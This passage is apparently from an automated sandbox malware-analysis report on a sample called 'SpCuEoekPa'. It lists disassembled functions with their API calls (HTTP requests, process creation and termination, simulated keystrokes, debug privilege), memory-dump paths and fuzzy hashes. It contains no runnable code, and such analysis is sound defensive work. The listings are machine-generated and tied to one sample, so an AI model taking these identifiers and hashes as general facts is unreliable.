                                                            • SelectObject.GDI32(00000000,00000000), ref: 0039CD53
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0039CD68
                                                            • ReleaseDC.USER32(?,00000000), ref: 0039CD70
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0039CDFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 4b9fe9aefeeadda315f910b0cc4fa64cf9d7c52278f56eca25b74c8f625a1221
                                                            • Instruction ID: 5d835b087b54c05bd90f21f32c112e53b38f840d26886d731459ff26c5b70301
                                                            • Opcode Fuzzy Hash: 4b9fe9aefeeadda315f910b0cc4fa64cf9d7c52278f56eca25b74c8f625a1221
                                                            • Instruction Fuzzy Hash: 0B71D031900605DFCF239F64C884AAA7BB9FF49320F15927AED595A2AAC7318C41DF60
                                                            Function 003D1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D1A50
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003D1A7C
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003D1ABE
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003D1AD3
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D1AE0
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003D1B10
                                                            • InternetCloseHandle.WININET(00000000), ref: 003D1B57
                                                              • Part of subcall function 003D2483: GetLastError.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D2498
                                                              • Part of subcall function 003D2483: SetEvent.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D24AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 2603140658-3916222277
                                                            • Opcode ID: 53c4a9b028f1bea7d5d25f9b2963faa6dbd0fec0cca92561975e85fe77d888c3
                                                            • Instruction ID: 3c6c7a278c04b11905eefa6eea3639b0b315e8e75dd66b54c78fbd307499695b
                                                            • Opcode Fuzzy Hash: 53c4a9b028f1bea7d5d25f9b2963faa6dbd0fec0cca92561975e85fe77d888c3
                                                            • Instruction Fuzzy Hash: E5413DB2501219BFEB129F60DC85FBB7BACEB08354F004127FD059A281E7B49E449BA0
                                                            Function 003D8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003EF910), ref: 003D8D28
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003EF910), ref: 003D8D5C
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003D8ED6
                                                            • SysFreeString.OLEAUT32(?), ref: 003D8F00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: 279c036fcccabd4663b2e4de3e35100f01436d9c3187a6f7e29342abfb6dcaf6
                                                            • Instruction ID: e261311493107671eeb3c727b162029f0bb1fb4a8966abbc905c7bbbbdfe2f88
                                                            • Opcode Fuzzy Hash: 279c036fcccabd4663b2e4de3e35100f01436d9c3187a6f7e29342abfb6dcaf6
                                                            • Instruction Fuzzy Hash: B7F16872A00209EFCF16DF94D884EAEB7B9FF48314F11819AF905AB251DB31AE45CB50
                                                            Function 003DF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003DF6B5
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DF848
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DF86C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DF8AC
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DF8CE
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003DFA4A
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003DFA7C
                                                            • CloseHandle.KERNEL32(?), ref: 003DFAAB
                                                            • CloseHandle.KERNEL32(?), ref: 003DFB22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: 3eee302d3068a3aae79fd1fd6207ed4f6015ae8990f1cb52acf16daa3fc62995
                                                            • Instruction ID: b3ddf490465bbf4c46deee1d52a7c8888b75ce806d351f920417eee7b0c6efc5
                                                            • Opcode Fuzzy Hash: 3eee302d3068a3aae79fd1fd6207ed4f6015ae8990f1cb52acf16daa3fc62995
                                                            • Instruction Fuzzy Hash: 0CE1A1326043409FC716EF24D891B6ABBE5AF85354F14856EF89A9F3A2CB30DC45CB52
                                                            Function 003C4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C3697,?), ref: 003C468B
                                                              • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C3697,?), ref: 003C46A4
                                                              • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 003C4D40
                                                            • _wcscmp.LIBCMT ref: 003C4D5A
                                                            • MoveFileW.KERNEL32(?,?), ref: 003C4D75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: 4860282c96c2e9cc82b6189064afad8deec07f5f6bb4e0c4251b8560939ff783
                                                            • Instruction ID: c518a42cdcab5a9d56a96c0dac2c18090ab6b936ae15b6982e32f8d4e2760f91
                                                            • Opcode Fuzzy Hash: 4860282c96c2e9cc82b6189064afad8deec07f5f6bb4e0c4251b8560939ff783
                                                            • Instruction Fuzzy Hash: 905165B20083859BC726EB60D895EDFB3ECAF85350F40492EF585D7152EF70A688C756
                                                            Function 003E8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003E86FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 3d5b3973efbb315cc1e2829bbfba29125807551af4db03e176f4e148184664b6
                                                            • Instruction ID: 0524806be2f364ec5b5395a8147dd65dd199e8f0b018ec60b1b487f5f893ae3e
                                                            • Opcode Fuzzy Hash: 3d5b3973efbb315cc1e2829bbfba29125807551af4db03e176f4e148184664b6
                                                            • Instruction Fuzzy Hash: 0D51B530A002E4BFDF229F26CC85FAD7B68AB05310F614715FA59EA1E0CF71A980DB40
                                                            Function 00362B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0039C2F7
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039C319
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0039C331
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0039C34F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0039C370
                                                            • DestroyIcon.USER32(00000000), ref: 0039C37F
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0039C39C
                                                            • DestroyIcon.USER32(?), ref: 0039C3AB
                                                              • Part of subcall function 003EA4AF: DeleteObject.GDI32(00000000), ref: 003EA4E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 6f626ad5321cce1e3dc8feec1b4b446415ca4b996d52a736e80e362d696e13c6
                                                            • Instruction ID: 3bba8f2ecf74d22c9e3f017e1edc3b86fea46967909e6d64f232d77293b5ec6e
                                                            • Opcode Fuzzy Hash: 6f626ad5321cce1e3dc8feec1b4b446415ca4b996d52a736e80e362d696e13c6
                                                            • Instruction Fuzzy Hash: 14517C74610605AFDF22DF64CC85FAB3BB9EB08310F118628F9429B2D0D7B0AD90DB50
                                                            Function 003B966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003BA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003BA84C
                                                              • Part of subcall function 003BA82C: GetCurrentThreadId.KERNEL32 ref: 003BA853
                                                              • Part of subcall function 003BA82C: AttachThreadInput.USER32(00000000,?,003B9683,?,00000001), ref: 003BA85A
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B968E
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003B96AB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003B96AE
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B96B7
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003B96D5
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003B96D8
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B96E1
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003B96F8
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003B96FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: d385d4f59669eb905b94bdc3aba50691ce363c402c33170c0663b6c2ff2541e5
                                                            • Instruction ID: 5d61e4cf4015083de972b247b9499f2ac73a87fb6daf043890d7de454b75d611
                                                            • Opcode Fuzzy Hash: d385d4f59669eb905b94bdc3aba50691ce363c402c33170c0663b6c2ff2541e5
                                                            • Instruction Fuzzy Hash: AD11CEB1910618BFF6226B60DC89FAA7F2DEB4C764F100525F344AF1E0C9F25C109AA4
                                                            Function 003B8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 003B892A
                                                            • HeapAlloc.KERNEL32(00000000), ref: 003B8931
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 003B8946
                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 003B894E
                                                            • DuplicateHandle.KERNEL32(00000000), ref: 003B8951
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 003B8961
                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 003B8969
                                                            • DuplicateHandle.KERNEL32(00000000), ref: 003B896C
                                                            • CreateThread.KERNEL32(00000000,00000000,003B8992,00000000,00000000,00000000), ref: 003B8986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 38b089c8c07d76e951b365c3b8c2d5931f3397ad917bd0b97bea4289f83c2a76
                                                            • Instruction ID: cfb14c482e2fceb6f6a2920f2038ac54513626d741ee901c6d8e3c831c874592
                                                            • Opcode Fuzzy Hash: 38b089c8c07d76e951b365c3b8c2d5931f3397ad917bd0b97bea4289f83c2a76
                                                            • Instruction Fuzzy Hash: F401AC75240348FFE621ABA5DC89F673B6CEB89711F418521FA05DF1D1CAB09800CA20
                                                            Function 003D9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: 27a04a1f557f2208cab64dc96c0a8be803c00b0426a074670c959dda240de773
                                                            • Instruction ID: 0855be69574a56336767982d699426c0ff42bf74c5f77b6e3b17c248ef952b76
                                                            • Opcode Fuzzy Hash: 27a04a1f557f2208cab64dc96c0a8be803c00b0426a074670c959dda240de773
                                                            • Instruction Fuzzy Hash: F4C19372A002199FDF11DF98E884BAEB7F9FB48314F15856BE905AB380E7709D45CB90
                                                            Function 003D975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003B710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?,?,003B7455), ref: 003B7127
                                                              • Part of subcall function 003B710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7142
                                                              • Part of subcall function 003B710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7150
                                                              • Part of subcall function 003B710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?), ref: 003B7160
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003D9806
                                                            • _memset.LIBCMT ref: 003D9813
                                                            • _memset.LIBCMT ref: 003D9956
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003D9982
                                                            • CoTaskMemFree.OLE32(?), ref: 003D998D
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 003D99DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: eabd3fc43c0912d0ccba791f3388cdb19cbe9a935ead57d782e95e3c29d713ca
                                                            • Instruction ID: 0d10bd74bb95c825e84af7af6f581df7de1f77f251985e7d3ae3a9a38b988c40
                                                            • Opcode Fuzzy Hash: eabd3fc43c0912d0ccba791f3388cdb19cbe9a935ead57d782e95e3c29d713ca
                                                            • Instruction Fuzzy Hash: 64913B72D00229EBDB12DFA5DC45EDEBBB9EF08310F10815AF519AB291DB715A44CFA0
                                                            Function 003E6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003E6E24
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 003E6E38
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003E6E52
                                                            • _wcscat.LIBCMT ref: 003E6EAD
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 003E6EC4
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003E6EF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 513bffd6ea81d389509d0cbdbfefa79cb07e558b69e1092bb897b7f639ee89b5
                                                            • Instruction ID: cc72d41dd03978ca9261e90a77b88afcbed7ff1a9e3d4a25ed0f7abd1a59bfd1
                                                            • Opcode Fuzzy Hash: 513bffd6ea81d389509d0cbdbfefa79cb07e558b69e1092bb897b7f639ee89b5
                                                            • Instruction Fuzzy Hash: FE41A370A00398EFDB229F64CC86BEE77A8EF58390F11462AF584EB1D1D6719D848B50
                                                            Function 003DE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003C3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 003C3C7A
                                                              • Part of subcall function 003C3C55: Process32FirstW.KERNEL32(00000000,?), ref: 003C3C88
                                                              • Part of subcall function 003C3C55: CloseHandle.KERNEL32(00000000), ref: 003C3D52
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DE9A4
                                                            • GetLastError.KERNEL32 ref: 003DE9B7
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DE9E6
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 003DEA63
                                                            • GetLastError.KERNEL32(00000000), ref: 003DEA6E
                                                            • CloseHandle.KERNEL32(00000000), ref: 003DEAA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: b2cdf2f3853cc9661da2b588cbb2dfce228e50019d7d4bda3e3d40891dc8eda3
                                                            • Instruction ID: edd8972a6712500338d330b3111d2276c7d9c7db700a5cd1400d5a356d7814c0
                                                            • Opcode Fuzzy Hash: b2cdf2f3853cc9661da2b588cbb2dfce228e50019d7d4bda3e3d40891dc8eda3
                                                            • Instruction Fuzzy Hash: C9419A712002019FDB26EF14DCA6F6EBBA9AF45314F14841AF9069F3D2CBB4AD04CB91
                                                            Function 003C2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 003C3033
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
